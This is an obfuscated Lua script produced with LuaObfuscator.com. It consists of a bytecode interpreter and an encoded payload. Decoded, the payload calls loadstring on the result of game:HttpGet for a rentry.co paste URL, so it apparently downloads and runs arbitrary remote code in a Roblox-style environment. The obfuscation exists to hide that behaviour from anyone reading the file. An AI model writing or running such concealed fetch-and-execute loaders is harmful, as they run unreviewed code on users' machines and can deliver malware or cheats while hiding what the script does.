--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==4) then v16=function(v22,v23,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==3) then v34=function()local v48=0 -0 ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(10 -7)) then if (v53==(135 -(84 + 51))) then if (v52==(0 + 0)) then return v54 * (0 + 0) ;else local v109=0 + 0 ;while true do if (v109==((0 + 0) -0)) then v53=1 + 0 ;v51=0 -0 ;break;end end end elseif (v53==(130 + 1917)) then return ((v52==0) and (v54 * ((3 -2)/(0 + 0)))) or (v54 * NaN) ;end return v9(v54,v53-(1304 -(118 + 163)) ) * (v51 + (v52/((1728 -(1302 + 120 + 304))^(39 + 13)))) ;end if (v48==(1974 -(593 + 1379))) then v53=v30(v50,21,104 -73 );v54=((v30(v50,1 + 31 )==(1335 -(1256 + 78))) and  -(1 + 0)) or (1633 -(1072 + 560)) ;v48=(4 -1) -0 ;end if (v48==((1672 -(501 + 1170)) + 0)) then v51=1581 -(830 + 750) ;v52=(v30(v50,1467 -(373 + 1093) ,1722 -(1520 + 182) ) * ((2 + 0)^((1575 + 305) -(219 + 1629)))) + v49 ;v48=2 + 0 ;end if (v48==(0 -0)) then v49=v33();v50=v33();v48=1 + 0 ;end end end;v35=nil;v35=function(v40)local v55;if  not v40 then v40=v33();if (v40==(0 -0)) then return "";end end v55=v4(v22,v28,(v28 + v40) -(1 + 0) );v28=v28 + v40 ;local v56={};for v76=1 + 0 , #v55 do v56[v76]=v3(v2(v4(v55,v76,v76)));end return v7(v56);end;v36=v33;v27=4;end if (v27==5) then v39=nil;v39=function(v41,v42,v43)local v57=v41[1];local v58=v41[2];local v59=v41[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v13("#",...) -1 ;local function v82()local v83=v57;local v84=v58;local v85=v59;local v86=v37;local v87={};local v88={};local v89={};for v98=0 -(0 -0) ,v81 do if ((1813<2650) and (v98>=v85)) then v87[v98-v85 ]=v80[v98 + (1617 -(1601 + 15)) ];else v89[v98]=v80[v98 + 1 ];end end local v90=(v81-v85) + (2 -1) ;local v91;local v92;while true do local v99=0 + 0 ;local v100;while true do if ((v99==(956 -(13 + 89 + 854))) or ((5373 -(189 + 433))<((3570 -(185 + 983)) -1420))) then v100=1331 -(811 + 520) ;while true do if ((v100==0) or (((3885 + 16054) -15353)<(130 + 401))) then local v113=0 -(0 + 0) ;while true do if (((2 -1)==v113) or ((5837 -1485)<=(2219 + 1792))) then v100=(520 -(34 + 485)) + 0 ;break;end if ((v113==(1058 -(316 + 742))) or (4002<(955 + 529))) then local v114=0 + 0 ;while true do if ((v114==(1 + 0)) or ((922 + 2438)<=613)) then v113=1 + 0 ;break;end if (((3805 + 296)>=(4462 -(370 + 416))) and (v114==(0 -0))) then v91=v83[v78];v92=v91[1 + 0 ];v114=1484 -(1331 + 152) ;end end end end end if (((12 + 126)<=(1722 + 2628)) and ((449 -(135 + 313))==v100)) then if (((5313 -(701 + 211))>=729) and (v92<=(8 -6))) then if ((v92<=0) or ((2663 -(899 + 159))==((205 -(14 + 48)) + (4149 -1914)))) then local v115=0 + 0 ;local v116;local v117;local v118;local v119;local v120;while true do if (((2924 -(267 + 434))>=(1573 + 38 + 295)) and (v115==1)) then v118=nil;v119=nil;v115=2;end if ((v115==(0 -0)) or ((4891 -(46 + 1461))>3894)) then v116=(2592 -(614 + 1084)) -(805 + 89) ;v117=nil;v115=765 -(456 + 308) ;end if ((v115==(2 + 0)) or ((1097 -(103 + 132))==(2117 + 682))) then v120=nil;while true do if (((1530 -(160 + 216 + 1152))==v116) or (2071==1336)) then for v149=v117,v79 do local v150=0;local v151;while true do if ((v150==(0 -0)) or ((942 + 408)>=(5447 -(24 + 526)))) then v151=(0 -0) -0 ;while true do if (((48 + 53)<(4845 -((1173 -(255 + 759)) + 887))) and ((0 + 0)==v151)) then v120=v120 + 1 ;v89[v149]=v118[v120];break;end end break;end end end break;end if (((4381 -(36 + (981 -(522 + 173))))>=(5632 -3034)) and ((0 + 0)==v116)) then local v144=0 + 0 ;while true do if ((v144==(0 + 0)) or ((14176 -9182)<(3158 -(540 + 1070)))) then v117=v91[1673 -(69 + (3332 -(1145 + 585))) ];v118,v119=v86(v89[v117](v14(v89,v117 + 1 ,v91[1 + 2 ])));v144=1 -0 ;end if ((1602>=(2818 -(1405 + 575))) and (v144==(2 -1))) then v116=935 -(908 + 26) ;break;end end end if (((6064 -(1032 + 945))>=(5298 -(302 + 1382))) and ((1 + 0)==v116)) then v79=(v119 + v117) -(1 + 0) ;v120=(2147 -(731 + 498)) -(174 + 744) ;v116=1328 -(135 + (3479 -2288)) ;end end break;end end elseif ((v92==(1681 -(357 + 1323))) or (2382<=938)) then local v124=(0 -0) + 0 ;local v125;local v126;local v127;while true do if (((2019 -1525)<(4597 -2897)) and ((249 -(218 + 30))==v124)) then v127=nil;while true do if (((13136 -9198)<=(751 + 3358)) and (v125==(1 + 0))) then while true do if ((v126==0) or ((942 -(196 + 113))>(4745 + 174))) then v127=v91[2];v89[v127]=v89[v127](v14(v89,v127 + (4 -3) ,v79));break;end end break;end if ((v125==(0 + 0)) or (289<=((105 -82) + 126))) then local v152=(0 -0) + 0 ;while true do if ((v152==(1 + 0 + 0)) or (1852>=(705 + 1325 + 259))) then v125=1 + (0 -0) ;break;end if ((v152==(1202 -(800 + 402))) or ((3773 -(236 + 588 + 706))>=(8490 -5075))) then v126=0 + 0 ;v127=nil;v152=2 -1 ;end end end end break;end if (((10690 -5788)>(4862 -(287 + 349))) and (v124==(1004 -(886 + 118)))) then v125=(0 + 0) -0 ;v126=nil;v124=1;end end else do return;end end elseif ((v92<=4) or ((818 + 2416)<(2174 -(936 + (557 -234))))) then if ((4026<=(11633 -7443)) and (v92==(1039 -(350 + 686)))) then v89[v91[1460 -((1977 -(701 + 1021)) + 1203) ]]();else local v128=1865 -(1751 + 114) ;local v129;local v130;while true do if ((v128==(0 -0)) or ((1457 + 1870)<=(806 + 529))) then local v137=(0 -0) -0 ;while true do if ((v137==((824 + 162) -(803 + 183))) or ((710 + (3179 -1404))==173)) then v129=v91[1959 -(410 + 1547) ];v130=v89[v91[2 + 1 ]];v137=2 -(1 -0) ;end if (((27 + 195)<=(13855 -9556)) and (1==v137)) then v128=(1600 -(1023 + 575)) -1 ;break;end end end if ((((1674 -513) -(332 + 828))==v128) or ((2348 -(785 + 838))>(8911 -5448))) then v89[v129 + 1 + 0 ]=v130;v89[v129]=v130[v91[8 -4 ]];break;end end end elseif (((405 + 64)<2315) and (v92>(8 -3))) then v89[v91[2]]=v91[1005 -(761 + 241) ];else v89[v91[1 + 1 ]]=v43[v91[3 + (0 -0) ]];end v78=v78 + 1 ;break;end end break;end end end end A,B=v37(v12(v82));if  not A[1] then local v101=0;local v102;while true do if (v101==0) then v102=v41[4][v78] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end;return v39(v38(),{},v23)(...);end if (v27==2) then v32=function()local v60,v61=v2(v22,v28,v28 + 2 + 0 );v28=v28 + 2 ;return (v61 * (68 + 188)) + v60 ;end;v33=nil;v33=function()local v62,v63,v64,v65=v2(v22,v28,v28 + 3 );v28=v28 + 4 ;return (v65 * (9234051 + 7543165)) + (v64 * (21447 + 44089)) + (v63 * (141 + 115)) + v62 ;end;v34=nil;v27=3;end if (v27==1) then v30=function(v44,v45,v46)if v46 then local v93=(v44/(2^(v45-1)))%((1710 -((696 -339) + 1351))^(((v46-(1 + 0)) -(v45-(594 -(504 + 89)))) + (1474 -(1339 + 134)))) ;return v93-(v93%(3 -(1547 -(6 + 1539)))) ;else local v94=0 -0 ;local v95;while true do if (v94==(0 + 0)) then v95=2^(v45-((1873 -1136) -(526 + 210))) ;return (((v44%(v95 + v95))>=v95) and (1 + 0)) or (1931 -(1874 + (89 -32))) ;end end end end;v31=nil;v31=function()local v66=v2(v22,v28,v28);v28=v28 + 1 ;return v66;end;v32=nil;v27=2;end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v67=0 + 0 ;local v68;local v69;local v70;local v71;local v72;local v73;local v74;local v75;while true do if ((1 + 0)==v67) then v70=nil;v71=nil;v67=2;end if (v67~=(6 -4)) then else v72=nil;v73=nil;v67=6 -3 ;end if (v67==(1748 -(1606 + 139))) then v74=nil;v75=nil;v67=4;end if (v67==(1928 -(293 + 1635))) then v68=0 + 0 ;v69=nil;v67=1;end if (4==v67) then while true do if (v68==1) then local v107=0;while true do if (v107~=(1 -0)) then else v68=1049 -(457 + 590) ;break;end if (v107~=(0 + 0)) then else v71=nil;v72=nil;v107=1791 -(1106 + 684) ;end end end if (v68==(3 -0)) then v75=nil;while true do local v110=0;local v111;while true do if (v110==(0 + 0)) then v111=0;while true do if ((1501 -(497 + 1004))==v111) then local v121=0;while true do if (v121==0) then if (v69==2) then local v141=0 -0 ;while true do if (1==v141) then for v157=1 + 0 ,v33() do local v158=1853 -(916 + 937) ;local v159;while true do if ((1656 -(903 + 753))==v158) then v159=v31();if (v30(v159,1 -0 ,1809 -(529 + 1279) )==0) then local v171=0 + 0 ;local v172;local v173;local v174;local v175;while true do if (v171==0) then v172=0;v173=nil;v171=1 + 0 ;end if (v171==2) then while true do if (v172==3) then if (v30(v174,3,5 -2 )==(470 -(72 + 397))) then v175[70 -(26 + 40) ]=v75[v175[4]];end v70[v157]=v175;break;end if (v172==(1 + 0)) then local v182=1779 -(8 + 1771) ;while true do if (1==v182) then v172=2;break;end if (v182==0) then v175={v32(),v32(),nil,nil};if (v173==0) then local v189=0;while true do if (v189==0) then v175[1239 -(356 + 880) ]=v32();v175[4]=v32();break;end end elseif (v173==(119 -(47 + 71))) then v175[6 -3 ]=v33();elseif (v173==2) then v175[3 + 0 ]=v33() -(2^(868 -(265 + 587))) ;elseif (v173==3) then local v199=0 + 0 ;local v200;while true do if (v199==(0 + 0)) then v200=0;while true do if (0~=v200) then else v175[3]=v33() -(2^(10 + 6)) ;v175[2 + 2 ]=v32();break;end end break;end end end v182=1;end end end if (v172~=(557 -(361 + 196))) then else local v183=0;while true do if (v183~=0) then else v173=v30(v159,761 -(669 + 90) ,2 + 1 );v174=v30(v159,1 + 3 ,140 -(69 + 65) );v183=558 -(284 + 273) ;end if (v183~=1) then else v172=1;break;end end end if (v172==2) then local v184=0;local v185;while true do if (v184~=(0 + 0)) then else v185=0;while true do if (v185==0) then if (v30(v174,1 + 0 ,2 -1 )~=1) then else v175[823 -(535 + 286) ]=v75[v175[2 + 0 ]];end if (v30(v174,2,2)==(1977 -(1557 + 419))) then v175[3]=v75[v175[5 -2 ]];end v185=1;end if (v185~=(1817 -(1366 + 450))) then else v172=3;break;end end break;end end end end break;end if (v171~=(1758 -(667 + 1090))) then else v174=nil;v175=nil;v171=2;end end end break;end end end v69=3;break;end if ((0 + 0)~=v141) then else for v160=1 + 0 ,v74 do local v161=0 -0 ;local v162;local v163;local v164;local v165;while true do if (v161==1) then v164=nil;v165=nil;v161=2;end if (v161~=2) then else while true do if (v162~=0) then else local v176=1922 -(1205 + 717) ;while true do if (v176~=(3 -2)) then else v162=1964 -(574 + 1389) ;break;end if (v176==0) then local v177=0;while true do if (1==v177) then v176=1;break;end if (v177==(0 -0)) then v163=1214 -(911 + 303) ;v164=nil;v177=1;end end end end end if (v162==(1 + 0)) then v165=nil;while true do if (v163==0) then local v178=0;local v179;while true do if (v178==0) then v179=0 -0 ;while true do if (v179~=0) then else local v188=0 -0 ;while true do if (1==v188) then v179=2 -1 ;break;end if ((0 + 0)==v188) then local v191=0;while true do if (v191~=(844 -(726 + 117))) then else v188=1;break;end if (v191==0) then v164=v31();v165=nil;v191=1;end end end end end if (v179==(882 -(655 + 226))) then v163=1 + 0 ;break;end end break;end end end if (v163==(1 + 0)) then if (v164==(572 -(257 + 314))) then v165=v31()~=0 ;elseif (v164==2) then v165=v34();elseif (v164==(55 -(36 + 16))) then v165=v35();end v75[v160]=v165;break;end end break;end end break;end if (v161==(680 -(617 + 63))) then v162=0 -0 ;v163=nil;v161=1 + 0 ;end end end v73[5 -2 ]=v31();v141=1 -0 ;end end end if (v69==1) then local v142=0;local v143;while true do if (v142==(0 + 0)) then v143=0;while true do if ((1 + 0)~=v143) then else v75={};v69=6 -4 ;break;end if (v143~=(0 + 0)) then else local v168=0;while true do if (v168~=1) then else v143=1;break;end if (v168==(102 -(46 + 56))) then v73={v70,v71,nil,v72};v74=v33();v168=1 + 0 ;end end end end break;end end end v121=1;end if (v121~=1) then else v111=1;break;end end end if (v111==1) then if (v69==3) then local v135=0 + 0 ;while true do if (v135~=0) then else for v145=2 -1 ,v33() do v71[v145-1 ]=v38();end for v147=1,v33() do v72[v147]=v33();end v135=896 -(182 + 713) ;end if (v135==(1 + 0)) then return v73;end end end if (v69~=0) then else local v136=0;while true do if (v136==(1778 -(531 + 1246))) then v72={};v69=1;break;end if (v136==(0 + 0)) then v70={};v71={};v136=1;end end end break;end end break;end end end break;end if ((1374 -(864 + 510))==v68) then local v108=751 -(538 + 213) ;while true do if (v108~=(911 -(151 + 760))) then else v69=0 -0 ;v70=nil;v108=1 -0 ;end if (v108~=1) then else v68=1 + 0 ;break;end end end if (2==v68) then v73=nil;v74=nil;v68=7 -4 ;end end break;end end end;v27=5;end if (0==v27) then v28=1;v29=nil;v22=v5(v4(v22,5),"..",function(v47)if (v2(v47,2)==79) then v29=v1(v4(v47,1,1));return "";else local v96=0;local v97;while true do if (v96==0) then v97=v3(v1(v47,16));if v29 then local v112=v6(v97,v29);v29=nil;return v112;else return v97;end break;end end end end);v30=nil;v27=1;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F72656E7472792E636F2F6661727A6164612O6479322F72617700083O0012053O00013O001205000100023O002004000100010003001206000300046O000100034O00015O00022O00033O000100012O00023O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end end end
